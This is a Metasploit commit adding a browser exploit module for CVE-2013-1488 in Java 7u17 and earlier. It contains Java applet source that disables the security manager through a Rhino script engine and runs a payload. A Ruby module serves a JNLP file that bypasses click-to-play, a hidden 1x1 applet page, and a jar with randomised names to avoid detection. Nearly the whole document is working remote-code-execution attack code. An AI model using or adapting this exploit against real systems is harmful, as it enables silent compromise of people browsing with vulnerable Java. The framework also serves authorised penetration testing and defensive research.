Land rapid7#1924 - Java pwn2own 2013: java_jre17_driver_manager (CVE-2013-1488)

wchen-r7 · wchen-r7 · commit aefcc5170407 · 2013-06-07T15:12:09.000-05:00
diff --git a/data/exploits/cve-2013-1488/Exploit.class b/data/exploits/cve-2013-1488/Exploit.class
diff --git a/data/exploits/cve-2013-1488/FakeDriver.class b/data/exploits/cve-2013-1488/FakeDriver.class
diff --git a/data/exploits/cve-2013-1488/FakeDriver2.class b/data/exploits/cve-2013-1488/FakeDriver2.class
diff --git a/data/exploits/cve-2013-1488/META-INF/services/java.lang.Object b/data/exploits/cve-2013-1488/META-INF/services/java.lang.Object
@@ -0,0 +1 @@
+com.sun.script.javascript.RhinoScriptEngine
diff --git a/data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver b/data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
@@ -0,0 +1,2 @@
+FakeDriver
+FakeDriver2
diff --git a/external/source/exploits/cve-2013-1488/Exploit.java b/external/source/exploits/cve-2013-1488/Exploit.java
@@ -0,0 +1,41 @@
+import java.applet.Applet;
+import java.awt.Graphics;
+import java.sql.*;
+//import java.lang.Runtime;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+
+    public void init()
+    {
+        try
+        {
+            System.out.println("Here we go...");
+			String url = "jdbc:msf:sql://127.0.0.1:8080/sample";
+			String userid = "userid";
+			String password = "password";
+            Connection con = DriverManager.getConnection(url, userid, password); 
+        }
+        catch(Exception localThrowable)
+        {
+            //localThrowable.printStackTrace();
+        }
+        try {
+			Payload.main(null);
+			//Runtime.getRuntime().exec("calc.exe");
+			
+		} catch(Exception ex) {
+			//ex.printStackTrace();
+		}
+    }
+
+    public void paint(Graphics paramGraphics)
+    {
+        paramGraphics.drawString("Loading", 50, 25);
+    }
+}
diff --git a/external/source/exploits/cve-2013-1488/FakeDriver.java b/external/source/exploits/cve-2013-1488/FakeDriver.java
@@ -0,0 +1,65 @@
+import java.sql.*;
+import java.util.logging.Logger;
+import java.util.Properties;
+import java.util.AbstractSet;
+import java.util.ServiceLoader;
+import java.util.Iterator;
+
+
+public class FakeDriver extends AbstractSet implements java.sql.Driver
+{
+    public static final String URL_PREFIX = "jdbc:msf:sql:";
+	public static ServiceLoader _s1;
+	
+    static {
+		_s1 = ServiceLoader.load(Object.class);
+    }
+    
+    public Iterator iterator()
+    {
+		return _s1.iterator();
+	}
+    
+    public FakeDriver() {
+	}
+
+    public final boolean acceptsURL(String url)
+        throws SQLException
+    {
+        return true;
+    }
+    
+	public final boolean jdbcCompliant() {
+        return true;
+    }
+ 
+    public final Logger getParentLogger() {
+		return null;
+	}
+	
+    public final int getMinorVersion() {
+        return 0;
+    }
+    
+	public final int getMajorVersion() {
+        return 1;
+    }
+    
+    public final DriverPropertyInfo[] getPropertyInfo(String url, Properties info)
+        throws SQLException
+    {
+        return null;
+    }
+    
+    
+    public final Connection connect(String url, Properties info)
+        throws SQLException
+    {
+        return null;
+    }
+
+	//AbstractSet
+	public final int size() {
+		return 2;
+	}
+}
diff --git a/external/source/exploits/cve-2013-1488/FakeDriver2.java b/external/source/exploits/cve-2013-1488/FakeDriver2.java
@@ -0,0 +1,70 @@
+import java.sql.*;
+import java.util.logging.Logger;
+import java.util.Properties;
+import java.util.HashSet;
+import java.util.Iterator;
+import javax.script.*;
+import java.io.*;
+import java.lang.*;
+
+public class FakeDriver2 extends HashSet implements java.sql.Driver
+{
+    public static final String URL_PREFIX = "jdbc:msf:sql:";
+
+    static {
+
+    }
+        
+    public FakeDriver2() {
+		Iterator i = FakeDriver._s1.iterator();		
+		try {
+			ScriptEngine e = (ScriptEngine)i.next();
+			Object proxy = (Object) e.eval(
+				"this.toString = function() {" +
+				"	java.lang.System.setSecurityManager(null);" +
+				"	return '';" +
+				"};" +
+				"e = new Error();" +
+				"e.message = this;" +
+				"e");
+			this.add(proxy);
+		} catch (Exception ex) {
+			//ex.printStackTrace();
+		}	
+	}
+
+    public final boolean acceptsURL(String url)
+        throws SQLException
+    {
+        return true;
+    }
+    
+	public final boolean jdbcCompliant() {
+        return true;
+    }
+ 
+    public final Logger getParentLogger() {
+		return null;
+	}
+	
+    public final int getMinorVersion() {
+        return 0;
+    }
+    
+	public final int getMajorVersion() {
+        return 1;
+    }
+    
+    public final DriverPropertyInfo[] getPropertyInfo(String url, Properties info)
+        throws SQLException
+    {
+        return null;
+    }
+        
+    public final Connection connect(String url, Properties info)
+        throws SQLException
+    {
+        return null;
+    }
+
+}
diff --git a/external/source/exploits/cve-2013-1488/META-INF/services/java.lang.Object b/external/source/exploits/cve-2013-1488/META-INF/services/java.lang.Object
@@ -0,0 +1 @@
+com.sun.script.javascript.RhinoScriptEngine
diff --git a/external/source/exploits/cve-2013-1488/META-INF/services/java.sql.Driver b/external/source/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
@@ -0,0 +1,2 @@
+FakeDriver
+FakeDriver2
diff --git a/external/source/exploits/cve-2013-1488/Makefile b/external/source/exploits/cve-2013-1488/Makefile
@@ -0,0 +1,19 @@
+CLASSES = \
+	Exploit.java  \
+	FakeDriver.java \
+    FakeDriver2.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/cve-2013-1488/
+	mv FakeDriver.class ../../../../data/exploits/cve-2013-1488/
+	mv FakeDriver2.class ../../../../data/exploits/cve-2013-1488/
+	cp -r META-INF ../../../../data/exploits/cve-2013-1488/
+
+clean:
+	rm -rf *.class
diff --git a/modules/exploits/multi/browser/java_jre17_driver_manager.rb b/modules/exploits/multi/browser/java_jre17_driver_manager.rb
@@ -0,0 +1,185 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::EXE
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+
+		super( update_info( info,
+			'Name'          => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
+			'Description'   => %q{
+					This module abuses the java.sql.DriverManager class where the toString() method
+				is called over user supplied classes, from a doPrivileged block. The vulnerability
+				affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE
+				throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java
+				Web Start can be launched automatically throw the ActiveX control. Otherwise the
+				applet is launched without click-to-play bypass.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'James Forshaw', # Vulnerability discovery and Analysis
+					'juan vazquez' # Metasploit module
+				],
+			'References'    =>
+				[
+					[ 'CVE', '2013-1488' ],
+					[ 'OSVDB', '91472' ],
+					[ 'BID', '58504' ],
+					[ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
+					[ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ]
+				],
+			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Platform' => ['java'],
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows x86 (Native Payload)',
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Mac OS X x86 (Native Payload)',
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Linux x86 (Native Payload)',
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86,
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jan 10 2013'
+		))
+	end
+
+
+	def setup
+		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class")
+		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class")
+		@driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class")
+		@driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")
+		@object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")
+		@driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+		@exploit_class_name = rand_text_alpha("Exploit".length)
+		@exploit_class.gsub!("Exploit", @exploit_class_name)
+
+		@jnlp_name = rand_text_alpha(8)
+
+		super
+	end
+
+	def jnlp_file
+		jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
+
+		jnlp = %Q|
+<?xml version="1.0" encoding="utf-8"?>
+<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
+	<information>
+		<title>Applet Test JNLP</title>
+		<vendor>#{rand_text_alpha(8)}</vendor>
+		<description>#{rand_text_alpha(8)}</description>
+		<offline-allowed/>
+	</information>
+
+	<resources>
+		<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
+		<jar href="#{rand_text_alpha(8)}.jar" main="true" />
+	</resources>
+	<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
+		<param name="__applet_ssv_validated" value="true"></param>
+	</applet-desc>
+	<update check="background"/>
+</jnlp>
+		|
+		return jnlp
+	end
+
+	def on_request_uri(cli, request)
+		print_status("handling request for #{request.uri}")
+
+		case request.uri
+		when /\.jnlp$/i
+			send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
+		when /\.jar$/i
+			jar = payload.encoded_jar
+			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+			jar.add_file("FakeDriver.class", @driver_class)
+			jar.add_file("FakeDriver2.class", @driver2_class)
+			jar.add_file("META-INF/services/java.lang.Object", @object_services)
+			jar.add_file("META-INF/services/java.sql.Driver", @driver_services)
+			metasploit_str = rand_text_alpha("metasploit".length)
+			payload_str = rand_text_alpha("payload".length)
+			jar.entries.each { |entry|
+				entry.name.gsub!("metasploit", metasploit_str)
+				entry.name.gsub!("Payload", payload_str)
+				entry.data = entry.data.gsub("metasploit", metasploit_str)
+				entry.data = entry.data.gsub("Payload", payload_str)
+			}
+			jar.build_manifest
+
+			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+		when /\/$/
+			payload = regenerate_payload(cli)
+			if not payload
+				print_error("Failed to generate the payload.")
+				send_not_found(cli)
+				return
+			end
+			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+		else
+			send_redirect(cli, get_resource() + '/', '')
+		end
+
+	end
+
+	def generate_html
+		jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
+
+		# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
+		# Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
+		html = %Q|
+		<html>
+		<body>
+		<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
+		<param name="app" value="#{jnlp_uri}">
+		<param name="back" value="true">
+		<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
+		</object>
+		</body>
+		</html>
+		|
+		return html
+	end
+
+end

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	`+com.sun.script.javascript.RhinoScriptEngine`